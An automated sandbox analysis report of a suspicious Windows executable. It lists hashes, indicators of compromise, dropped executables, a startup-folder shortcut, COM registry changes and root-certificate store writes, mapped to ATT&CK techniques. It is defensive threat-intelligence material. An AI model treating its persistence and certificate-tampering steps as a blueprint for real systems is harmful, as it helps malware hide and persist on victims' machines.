c90b059163c2e19952d3223afb985ae950c35060a8cb39560bcbd1b4c398884d

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
10-04-2024 11:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe
Size

111.3MB
MD5

0528d25fbaff11e69be186da25057e70
SHA1

bfd60e47cdedd1f0f1a1e6a3b9d0dcee72537120
SHA256

77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23
SHA512

ff4d9c6f764dce822e669f2b20811e6fa1a98a21db37ad464621a1252e6ba75619c650001b5e699876903324d3d151a7a859abf27d68e6f54143bbc2b89f0af3
SSDEEP

393216:2YQJsv6tWKFdu9Ct3KXFmvflTsvQsFF8c3E9YjhHt1ew5vHNTAEN7RW11vQ6iRxV:D23mmvNTsec3E9shN1ew5A5BMvOc

Score

7^/10

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\mICROsofT\WINDows\start MENu\ProgrAms\sTartup\a7e3deb216e4619f65433aa5cb328.LNk	powershell.exe

Executes dropped EXE 2 IoCs

pid	Process
2364	CMmnnjAi1984unbd.exe
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe

Loads dropped DLL 7 IoCs

pid	Process
1116	77fa1b6fc7f192b0c983d1f8ecc73effae4f688a49439a7df27e76cfba870d23.exe
2364	CMmnnjAi1984unbd.exe
1252	regsvr32.exe
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
2576	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
1640	DllHost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6DE7C610-61B1-4E87-BF2C-8610610EFD4E}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{4BFB0279-33AB-4CDC-A8CD-8DBC18A6A398}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{86FF4A31-02B9-46B5-BE4D-F741207A89CD}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{56C4EDBE-82CB-4B59-B4FB-F7DFBE6E67AF}\ = "IOptionItemInfo"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\yangtfpbluyt\shell\open	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5887D2B7-4C1D-41FA-889A-0179A2B37687}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{966A633F-75E7-4844-87DA-665046381376}\Version\ = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{484B7414-E690-44FD-A410-CAB40C32237A}\ProxyStubClsid32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99A7E6B4-13B0-4C02-861C-D8800657F9BB}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6D97233C-AC4C-4B6C-BC2E-9E307351F9F6}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{67876F29-EB73-42F3-96EF-C803A2F5F597}\ = "CancelDataStruct Class"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D738DB2-3488-4C17-B36A-5173D7D764A9}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083EC4E3-C4EC-4924-AF43-F1AFF83CE9F1}\InprocServer32	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{005557BB-8996-4B60-9747-03740FE0A9E0}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B476F162-E20C-49CB-814C-AAD62AC7ABC9}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0084E94B-99A0-48F0-ACC8-3EBE184C5A7A}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6353CDBC-202F-4A5D-B42E-B7F6A208932B}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6353CDBC-202F-4A5D-B42E-B7F6A208932B}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD2DDB7C-DD73-446F-BAE8-FA8D3AA7AEEE}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0084E94B-99A0-48F0-ACC8-3EBE184C5A7A}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{702AE733-1472-47F4-AB6B-6D020633D689}\Version\ = "1.0"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{702AE733-1472-47F4-AB6B-6D020633D689}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{99A7E6B4-13B0-4C02-861C-D8800657F9BB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{56C4EDBE-82CB-4B59-B4FB-F7DFBE6E67AF}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{6353CDBC-202F-4A5D-B42E-B7F6A208932B}\Version	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0A30780E-810C-4D09-814D-6A5901ADA2EB}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B0EF82CA-662B-4DC6-A4A4-33D2EE9AF558}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0D453658-9054-4539-8C27-6FD8A97D4EA1}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{12210765-45D5-4720-B989-C8928EE9A3A9}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{86FF4A31-02B9-46B5-BE4D-F741207A89CD}\ = "IOfferItemModule"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0084E94B-99A0-48F0-ACC8-3EBE184C5A7A}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{083EC4E3-C4EC-4924-AF43-F1AFF83CE9F1}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{01FA4F97-1E18-44DF-9F56-48B6F38160FC}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{38F67915-B73F-4B56-9582-A0CEFA6DBA98}	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{702AE733-1472-47F4-AB6B-6D020633D689}\InprocServer32	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{484B7414-E690-44FD-A410-CAB40C32237A}\ = "ISaveUserDataStruct"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B0EF82CA-662B-4DC6-A4A4-33D2EE9AF558}\ProxyStubClsid32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99A7E6B4-13B0-4C02-861C-D8800657F9BB}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{314361EC-B6FB-4864-B8B4-5BE49FC3034F}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{575D7782-AD15-4B78-ACFC-749BA5ABE1BC}\ = "OptionItemInfo Class"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{575D7782-AD15-4B78-ACFC-749BA5ABE1BC}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{C310D253-8068-41C9-9A73-76F5DE090612}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{91C65607-3623-45CB-A3BF-10A60F9685FB}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0D453658-9054-4539-8C27-6FD8A97D4EA1}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{12210765-45D5-4720-B989-C8928EE9A3A9}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{91C65607-3623-45CB-A3BF-10A60F9685FB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{01FA4F97-1E18-44DF-9F56-48B6F38160FC}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{587B84DE-8C24-4AA4-B35E-9EFDD0189968}\InprocServer32\ = "C:\\ProgramData\\PDFsam Enhanced 7\\Installation\\Statistics.dll"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D16B343-C0E3-4492-9122-BFEC46391E58}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{005557BB-8996-4B60-9747-03740FE0A9E0}\ = "DownloadItemExternalApp Class"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B9A7DB4F-2333-47B6-B9F5-C691B37D13DF}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9114A001-5264-4FFD-9852-3D967E3AD947}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A9B840F0-5D75-4B35-9B76-923CA5E60695}\Version	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}\1.0\FLAGS	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E177E81C-DEE7-46F9-AD34-12D7F573C2A5}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F61DA78-EB43-4906-A703-3C4C3F581029}\InprocServer32\ThreadingModel = "Apartment"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{A869D8E5-32F1-4706-96DB-C05D95FD4A5B}\AppID = "{77EC23C5-BB68-4A7B-AE5C-F4AD0B6C678D}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5887D2B7-4C1D-41FA-889A-0179A2B37687}\AppID = "{77EC23C5-BB68-4A7B-AE5C-F4AD0B6C678D}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E177E81C-DEE7-46F9-AD34-12D7F573C2A5}\ = "ICancelDataStruct"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{981CC4BD-3A05-4EAB-9080-0C3B6BD6A713}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{12210765-45D5-4720-B989-C8928EE9A3A9}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{7D738DB2-3488-4C17-B36A-5173D7D764A9}\TypeLib\ = "{336A1FBB-E907-46CB-9FC8-42DAB7C05E70}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{5887D2B7-4C1D-41FA-889A-0179A2B37687}\ = "DownloadItemModule3_1 Class"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{181D3DCA-28AE-4392-876D-5DD31CDADAEF}\TypeLib	regsvr32.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	705ba650-5bf0-4e56-b6a7-e0998f5884d4.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
